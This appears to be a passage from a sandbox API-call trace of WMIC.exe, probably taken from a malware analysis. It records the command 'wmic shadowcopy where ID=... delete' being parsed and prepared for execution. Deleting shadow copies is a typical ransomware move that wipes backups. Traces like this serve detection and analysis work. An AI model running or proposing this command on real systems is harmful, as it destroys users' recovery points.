SysStringLen (param_1="MOF") returned 0x3 [0097.108] SysStringLen (param_1="RAWXML") returned 0x6 [0097.108] SysStringLen (param_1="LIST") returned 0x4 [0097.108] SysStringLen (param_1="MOF") returned 0x3 [0097.108] malloc (_Size=0x30) returned 0x1d8240 [0097.108] malloc (_Size=0x18) returned 0x1dc720 [0097.108] free (_Block=0x1dc720) [0097.108] malloc (_Size=0x18) returned 0x1dc720 [0097.108] malloc (_Size=0x18) returned 0x1dc740 [0097.108] SysStringLen (param_1="CSV") returned 0x3 [0097.108] SysStringLen (param_1="TABLE") returned 0x5 [0097.108] SysStringLen (param_1="CSV") returned 0x3 [0097.109] SysStringLen (param_1="LIST") returned 0x4 [0097.109] SysStringLen (param_1="CSV") returned 0x3 [0097.109] SysStringLen (param_1="HTABLE") returned 0x6 [0097.109] SysStringLen (param_1="CSV") returned 0x3 [0097.109] SysStringLen (param_1="HFORM") returned 0x5 [0097.109] malloc (_Size=0x30) returned 0x1d8280 [0097.109] malloc (_Size=0x18) returned 0x1dc760 [0097.109] free (_Block=0x1dc760) [0097.109] malloc (_Size=0x18) returned 0x1dc760 [0097.109] malloc (_Size=0x18) returned 0x1dc780 [0097.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.109] SysStringLen (param_1="TABLE") returned 0x5 [0097.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.109] SysStringLen (param_1="VALUE") returned 0x5 [0097.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.109] SysStringLen (param_1="XML") returned 0x3 [0097.109] SysStringLen (param_1="XML") returned 0x3 [0097.109] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.109] malloc (_Size=0x30) returned 0x1d82c0 [0097.110] malloc (_Size=0x18) returned 0x1dc7a0 [0097.110] free (_Block=0x1dc7a0) [0097.110] malloc (_Size=0x18) returned 0x1dc7a0 [0097.110] malloc (_Size=0x18) returned 0x1dc7c0 [0097.122] SysStringLen (param_1="texttablewsys") returned 0xd [0097.122] SysStringLen (param_1="TABLE") returned 0x5 [0097.122] SysStringLen (param_1="texttablewsys") returned 0xd [0097.122] SysStringLen (param_1="XML") returned 0x3 [0097.122] SysStringLen (param_1="texttablewsys") returned 0xd [0097.122] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.122] SysStringLen (param_1="XML") returned 0x3 [0097.122] SysStringLen (param_1="texttablewsys") returned 0xd [0097.122] malloc (_Size=0x30) returned 0x1d8300 [0097.122] malloc (_Size=0x18) returned 0x1dc7e0 [0097.122] free (_Block=0x1dc7e0) [0097.122] malloc (_Size=0x18) returned 0x1dc7e0 [0097.122] malloc (_Size=0x18) returned 0x1dc800 [0097.123] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.123] SysStringLen (param_1="TABLE") returned 0x5 [0097.123] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.123] SysStringLen (param_1="XML") returned 0x3 [0097.123] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.123] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.123] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.123] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.123] malloc (_Size=0x30) returned 0x1d8340 [0097.123] malloc (_Size=0x18) returned 0x1dc820 [0097.123] free (_Block=0x1dc820) [0097.123] malloc (_Size=0x18) returned 0x1dc820 [0097.123] malloc (_Size=0x18) returned 0x1dc840 [0097.123] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.123] SysStringLen (param_1="TABLE") returned 0x5 [0097.123] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.123] SysStringLen (param_1="XML") returned 0x3 [0097.123] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.123] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.123] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.123] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.123] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.123] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.123] malloc (_Size=0x30) returned 0x1d8380 [0097.124] malloc (_Size=0x18) returned 0x1dc860 [0097.124] free (_Block=0x1dc860) [0097.124] malloc (_Size=0x18) returned 0x1dc860 [0097.124] malloc (_Size=0x18) returned 0x1dc880 [0097.124] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.124] SysStringLen (param_1="TABLE") returned 0x5 [0097.124] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.124] SysStringLen (param_1="XML") returned 0x3 [0097.124] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.124] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.124] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.124] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.124] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.124] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.124] malloc (_Size=0x30) returned 0x1d83c0 [0097.124] malloc (_Size=0x18) returned 0x1dc8a0 [0097.125] free (_Block=0x1dc8a0) [0097.125] malloc (_Size=0x18) returned 0x1dc8a0 [0097.125] malloc (_Size=0x18) returned 0x1dc8c0 [0097.125] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.125] SysStringLen (param_1="TABLE") returned 0x5 [0097.125] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.125] SysStringLen (param_1="XML") returned 0x3 [0097.125] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.125] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.125] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.125] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.125] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.125] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.125] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.125] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0097.125] malloc (_Size=0x30) returned 0x1d8400 [0097.125] malloc (_Size=0x18) returned 0x1dc8e0 [0097.125] free (_Block=0x1dc8e0) [0097.125] malloc (_Size=0x18) returned 0x1dc8e0 [0097.126] malloc (_Size=0x18) returned 0x1dc900 [0097.126] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.126] SysStringLen (param_1="TABLE") returned 0x5 [0097.126] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.126] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.126] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.126] SysStringLen (param_1="XML") returned 0x3 [0097.126] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.126] SysStringLen (param_1="texttablewsys") returned 0xd [0097.126] SysStringLen (param_1="XML") returned 0x3 [0097.126] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.126] malloc (_Size=0x30) returned 0x1d8440 [0097.126] malloc (_Size=0x18) returned 0x1dc920 [0097.126] free (_Block=0x1dc920) [0097.126] malloc (_Size=0x18) returned 0x1dc920 [0097.126] malloc (_Size=0x18) returned 0x1dc940 [0097.126] SysStringLen (param_1="htable-sortby") returned 0xd [0097.126] SysStringLen (param_1="TABLE") returned 0x5 [0097.126] SysStringLen (param_1="htable-sortby") returned 0xd [0097.126] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.127] SysStringLen (param_1="htable-sortby") returned 0xd [0097.127] SysStringLen (param_1="XML") returned 0x3 [0097.127] SysStringLen (param_1="htable-sortby") returned 0xd [0097.127] SysStringLen (param_1="texttablewsys") returned 0xd [0097.127] SysStringLen (param_1="htable-sortby") returned 0xd [0097.127] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0097.127] SysStringLen (param_1="XML") returned 0x3 [0097.127] SysStringLen (param_1="htable-sortby") returned 0xd [0097.127] malloc (_Size=0x30) returned 0x1d8480 [0097.127] malloc (_Size=0x18) returned 0x1dc960 [0097.127] free (_Block=0x1dc960) [0097.127] malloc (_Size=0x18) returned 0x1dc960 [0097.127] malloc (_Size=0x18) returned 0x1dc980 [0097.127] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.127] SysStringLen (param_1="TABLE") returned 0x5 [0097.127] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.127] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.127] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.127] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.127] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.127] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.127] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.128] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.128] malloc (_Size=0x30) returned 0x1d84c0 [0097.128] malloc (_Size=0x18) returned 0x1dc9a0 [0097.128] free (_Block=0x1dc9a0) [0097.128] malloc (_Size=0x18) returned 0x1dc9a0 [0097.128] malloc (_Size=0x18) returned 0x1dc9c0 [0097.128] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.128] SysStringLen (param_1="TABLE") returned 0x5 [0097.128] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.128] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.128] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.128] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.128] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.128] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0097.128] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.128] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0097.128] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.128] SysStringLen (param_1="wmiclimofformat") returned 0xf [0097.128] malloc (_Size=0x30) returned 0x1d8500 [0097.129] malloc (_Size=0x18) returned 0x1dc9e0 [0097.129] free (_Block=0x1dc9e0) [0097.129] malloc (_Size=0x18) returned 0x1dc9e0 [0097.129] malloc (_Size=0x18) returned 0x1dca00 [0097.129] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.129] SysStringLen (param_1="TABLE") returned 0x5 [0097.129] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.129] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.129] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.129] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.129] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.129] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.129] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.129] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.129] malloc (_Size=0x30) returned 0x1d8540 [0097.129] malloc (_Size=0x18) returned 0x1dca20 [0097.129] free (_Block=0x1dca20) [0097.129] malloc (_Size=0x18) returned 0x1dca20 [0097.129] malloc (_Size=0x18) returned 0x1dca40 [0097.129] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.129] SysStringLen (param_1="TABLE") returned 0x5 [0097.129] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.129] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0097.130] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.130] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0097.130] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.130] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.130] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.130] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0097.130] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0097.130] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0097.130] malloc (_Size=0x30) returned 0x1d8580 [0097.130] FreeThreadedDOMDocument:IUnknown:Release (This=0x24271d0) returned 0x0 [0097.130] free (_Block=0x1d6e90) [0097.130] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete" [0097.130] malloc (_Size=0xe0) returned 0x1dcd30 [0097.130] memcpy_s (in: _Destination=0x1dcd30, _DestinationSize=0xde, _Source=0x2b25be, _SourceSize=0xd0 | out: _Destination=0x1dcd30) returned 0x0 [0097.130] malloc (_Size=0x18) returned 0x1dca60 [0097.130] malloc (_Size=0x18) returned 0x1dca80 [0097.130] malloc (_Size=0x18) returned 0x1dcaa0 [0097.130] malloc (_Size=0x18) returned 0x1dcac0 [0097.131] malloc (_Size=0x80) returned 0x1d6e90 [0097.131] GetLocalTime (in: lpSystemTime=0x10f690 | out: lpSystemTime=0x10f690*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x1, wMilliseconds=0x2be)) [0097.131] _vsnwprintf (in: _Buffer=0x1d6e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x10f5e8 | out: _Buffer="09-04-2020T08:55:01") returned 19 [0097.131] lstrlenW (lpString=" shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 71 [0097.131] malloc (_Size=0x90) returned 0x1d70a0 [0097.131] lstrlenW (lpString=" shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 71 [0097.131] lstrlenW (lpString=" shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 71 [0097.131] malloc (_Size=0x90) returned 0x1dce20 [0097.131] lstrlenW (lpString=" shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 71 [0097.131] lstrlenW (lpString=" shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 71 [0097.131] lstrlenW (lpString=" shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 71 [0097.131] malloc (_Size=0x16) returned 0x1dcae0 [0097.131] lstrlenW (lpString="shadowcopy") returned 10 [0097.131] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0097.131] malloc (_Size=0x16) returned 0x1dcb00 [0097.131] malloc (_Size=0x8) returned 0x1d7140 [0097.131] free (_Block=0x0) [0097.131] free (_Block=0x1dcae0) [0097.131] lstrlenW (lpString=" shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 71 [0097.131] malloc (_Size=0xc) returned 0x1dcae0 [0097.131] lstrlenW (lpString="where") returned 5 [0097.131] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0097.131] malloc (_Size=0xc) returned 0x1dcb20 [0097.131] malloc (_Size=0x10) returned 0x1dcb40 [0097.131] memmove_s (in: _Destination=0x1dcb40, _DestinationSize=0x8, _Source=0x1d7140, _SourceSize=0x8 | out: _Destination=0x1dcb40) returned 0x0 [0097.131] free (_Block=0x1d7140) [0097.131] free (_Block=0x0) [0097.131] free (_Block=0x1dcae0) [0097.131] lstrlenW (lpString=" shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 71 [0097.131] malloc (_Size=0x5c) returned 0x1dcec0 [0097.131] lstrlenW (lpString="\"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\"") returned 45 [0097.131] _wcsicmp (_String1="\"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\"", _String2="\"NULL\"") returned -5 [0097.131] lstrlenW (lpString="\"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\"") returned 45 [0097.131] lstrlenW (lpString="\"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\"") returned 45 [0097.131] malloc (_Size=0x5c) returned 0x1dcf30 [0097.131] malloc (_Size=0x18) returned 0x1dcae0 [0097.131] memmove_s (in: _Destination=0x1dcae0, _DestinationSize=0x10, _Source=0x1dcb40, _SourceSize=0x10 | out: _Destination=0x1dcae0) returned 0x0 [0097.131] free (_Block=0x1dcb40) [0097.132] free (_Block=0x0) [0097.132] free (_Block=0x1dcec0) [0097.132] lstrlenW (lpString=" shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete") returned 71 [0097.132] malloc (_Size=0xe) returned 0x1dcb40 [0097.132] lstrlenW (lpString="delete") returned 6 [0097.132] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0097.132] malloc (_Size=0xe) returned 0x1dcb60 [0097.132] malloc (_Size=0x20) returned 0x1dcec0 [0097.132] memmove_s (in: _Destination=0x1dcec0, _DestinationSize=0x18, _Source=0x1dcae0, _SourceSize=0x18 | out: _Destination=0x1dcec0) returned 0x0 [0097.132] free (_Block=0x1dcae0) [0097.132] free (_Block=0x0) [0097.132] free (_Block=0x1dcb40) [0097.132] malloc (_Size=0x20) returned 0x1dcef0 [0097.132] lstrlenW (lpString="QUIT") returned 4 [0097.132] lstrlenW (lpString="shadowcopy") returned 10 [0097.132] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0097.132] lstrlenW (lpString="EXIT") returned 4 [0097.132] lstrlenW (lpString="shadowcopy") returned 10 [0097.132] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0097.132] free (_Block=0x1dcef0) [0097.132] WbemLocator:IUnknown:AddRef (This=0x1f51390) returned 0x2 [0097.132] malloc (_Size=0x20) returned 0x1dcef0 [0097.132] lstrlenW (lpString="/") returned 1 [0097.132] lstrlenW (lpString="shadowcopy") returned 10 [0097.132] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0097.132] lstrlenW (lpString="-") returned 1 [0097.132] lstrlenW (lpString="shadowcopy") returned 10 [0097.132] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0097.132] lstrlenW (lpString="CLASS") returned 5 [0097.132] lstrlenW (lpString="shadowcopy") returned 10 [0097.132] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0097.132] lstrlenW (lpString="PATH") returned 4 [0097.132] lstrlenW (lpString="shadowcopy") returned 10 [0097.132] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0097.132] lstrlenW (lpString="CONTEXT") returned 7 [0097.132] lstrlenW (lpString="shadowcopy") returned 10 [0097.132] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0097.133] lstrlenW (lpString="shadowcopy") returned 10 [0097.133] malloc (_Size=0x16) returned 0x1dcb40 [0097.133] lstrlenW (lpString="shadowcopy") returned 10 [0097.133] GetCurrentThreadId () returned 0xb38 [0097.133] ??0CHString@@QEAA@XZ () returned 0x10f4a0 [0097.133] malloc (_Size=0x18) returned 0x1dcae0 [0097.133] malloc (_Size=0x18) returned 0x1dcb80 [0097.133] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f51390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff672998 | out: ppNamespace=0xff672998*=0x1f63a98) returned 0x0 [0097.148] free (_Block=0x1dcb80) [0097.148] free (_Block=0x1dcae0) [0097.148] CoSetProxyBlanket (pProxy=0x1f63a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0097.148] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0097.148] GetCurrentThreadId () returned 0xb38 [0097.148] ??0CHString@@QEAA@XZ () returned 0x10f338 [0097.148] malloc (_Size=0x18) returned 0x1dcae0 [0097.148] malloc (_Size=0x18) returned 0x1dcb80 [0097.148] malloc (_Size=0x18) returned 0x1dcba0 [0097.148] malloc (_Size=0x18) returned 0x1dcbc0 [0097.149] SysStringLen (param_1="root\\cli") returned 0x8 [0097.149] SysStringLen (param_1="\\") returned 0x1 [0097.149] malloc (_Size=0x18) returned 0x1dcbe0 [0097.149] SysStringLen (param_1="root\\cli\\") returned 0x9 [0097.149] SysStringLen (param_1="ms_409") returned 0x6 [0097.149] free (_Block=0x1dcbc0) [0097.149] free (_Block=0x1dcba0) [0097.149] free (_Block=0x1dcb80) [0097.149] free (_Block=0x1dcae0) [0097.149] malloc (_Size=0x18) returned 0x1dcae0 [0097.149] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f51390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff6729a0 | out: ppNamespace=0xff6729a0*=0x1f63b28) returned 0x0 [0097.153] free (_Block=0x1dcae0) [0097.153] free (_Block=0x1dcbe0) [0097.153] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0097.153] GetCurrentThreadId () returned 0xb38 [0097.153] ??0CHString@@QEAA@XZ () returned 0x10f4b0 [0097.153] malloc (_Size=0x18) returned 0x1dcbe0 [0097.153] malloc (_Size=0x18) returned 0x1dcae0 [0097.153] malloc (_Size=0x18) returned 0x1dcb80 [0097.153] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0097.153] malloc (_Size=0x3a) returned 0x1dcfa0 [0097.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff601980, cbMultiByte=-1, lpWideCharStr=0x1dcfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0097.153] free (_Block=0x1dcfa0) [0097.153] malloc (_Size=0x18) returned 0x1dcba0 [0097.153] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0097.153] SysStringLen (param_1="shadowcopy") returned 0xa [0097.154] malloc (_Size=0x18) returned 0x1dcbc0 [0097.154] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0097.154] SysStringLen (param_1="'") returned 0x1 [0097.154] free (_Block=0x1dcba0) [0097.154] free (_Block=0x1dcb80) [0097.154] free (_Block=0x1dcae0) [0097.154] free (_Block=0x1dcbe0) [0097.154] IWbemServices:GetObject (in: This=0x1f63a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x10f4b8*=0x0, ppCallResult=0x0 | out: ppObject=0x10f4b8*=0x1f704e0, ppCallResult=0x0) returned 0x0 [0097.159] malloc (_Size=0x18) returned 0x1dcbe0 [0097.159] IWbemClassObject:Get (in: This=0x1f704e0, wszName="Target", lFlags=0, pVal=0x10f3e0*(varType=0x0, wReserved1=0xff67, wReserved2=0x0, wReserved3=0x0, varVal1=0xff672998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f3e0*(varType=0x8, wReserved1=0xff67, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.159] free (_Block=0x1dcbe0) [0097.159] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.159] malloc (_Size=0x3e) returned 0x1dcfa0 [0097.159] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0097.159] malloc (_Size=0x18) returned 0x1dcbe0 [0097.159] IWbemClassObject:Get (in: This=0x1f704e0, wszName="PWhere", lFlags=0, pVal=0x10f3e0*(varType=0x0, wReserved1=0xff67, wReserved2=0x0, wReserved3=0x0, varVal1=0x2de298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f3e0*(varType=0x8, wReserved1=0xff67, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.159] free (_Block=0x1dcbe0) [0097.159] lstrlenW (lpString=" Where ID = '#'") returned 15 [0097.159] malloc (_Size=0x20) returned 0x1dcff0 [0097.160] lstrlenW (lpString=" Where ID = '#'") returned 15 [0097.160] malloc (_Size=0x18) returned 0x1dcbe0 [0097.160] IWbemClassObject:Get (in: This=0x1f704e0, wszName="Connection", lFlags=0, pVal=0x10f3e0*(varType=0x0, wReserved1=0xff67, wReserved2=0x0, wReserved3=0x0, varVal1=0x32bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f3e0*(varType=0xd, wReserved1=0xff67, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f709c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.160] free (_Block=0x1dcbe0) [0097.160] IUnknown:QueryInterface (in: This=0x1f709c0, riid=0xff607360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x10f3d0 | out: ppvObject=0x10f3d0*=0x1f709c0) returned 0x0 [0097.160] GetCurrentThreadId () returned 0xb38 [0097.160] ??0CHString@@QEAA@XZ () returned 0x10f2f8 [0097.160] malloc (_Size=0x18) returned 0x1dcbe0 [0097.160] IWbemClassObject:Get (in: This=0x1f709c0, wszName="Namespace", lFlags=0, pVal=0x10f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff61738f, varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f320*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.160] free (_Block=0x1dcbe0) [0097.160] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0097.160] malloc (_Size=0x16) returned 0x1dcbe0 [0097.160] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0097.160] malloc (_Size=0x18) returned 0x1dcae0 [0097.160] IWbemClassObject:Get (in: This=0x1f709c0, wszName="Locale", lFlags=0, pVal=0x10f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35a648, varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f320*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.160] free (_Block=0x1dcae0) [0097.160] lstrlenW (lpString="ms_409") returned 6 [0097.160] malloc (_Size=0xe) returned 0x1dcae0 [0097.160] lstrlenW (lpString="ms_409") returned 6 [0097.160] malloc (_Size=0x18) returned 0x1dcb80 [0097.161] IWbemClassObject:Get (in: This=0x1f709c0, wszName="User", lFlags=0, pVal=0x10f320*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35a648, varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35a648, varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.161] free (_Block=0x1dcb80) [0097.161] malloc (_Size=0x18) returned 0x1dcb80 [0097.161] IWbemClassObject:Get (in: This=0x1f709c0, wszName="Password", lFlags=0, pVal=0x10f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35a648, varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35a648, varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.161] free (_Block=0x1dcb80) [0097.161] malloc (_Size=0x18) returned 0x1dcb80 [0097.161] IWbemClassObject:Get (in: This=0x1f709c0, wszName="Server", lFlags=0, pVal=0x10f320*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x35a648, varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f320*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x1dcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0097.161] free (_Block=0x1dcb80) [0097.161] lstrlenW (lpString=".") returned 1 [0097.161] malloc (_Size=0x4) returned 0x1d7140 [0097.161] lstrlenW (lpString=".") returned 1 [0097.161] malloc (_Size=0x18) returned 0x1dcb80 [0097.161] IWbemClassObject:Get (in: This=0x1f709c0, 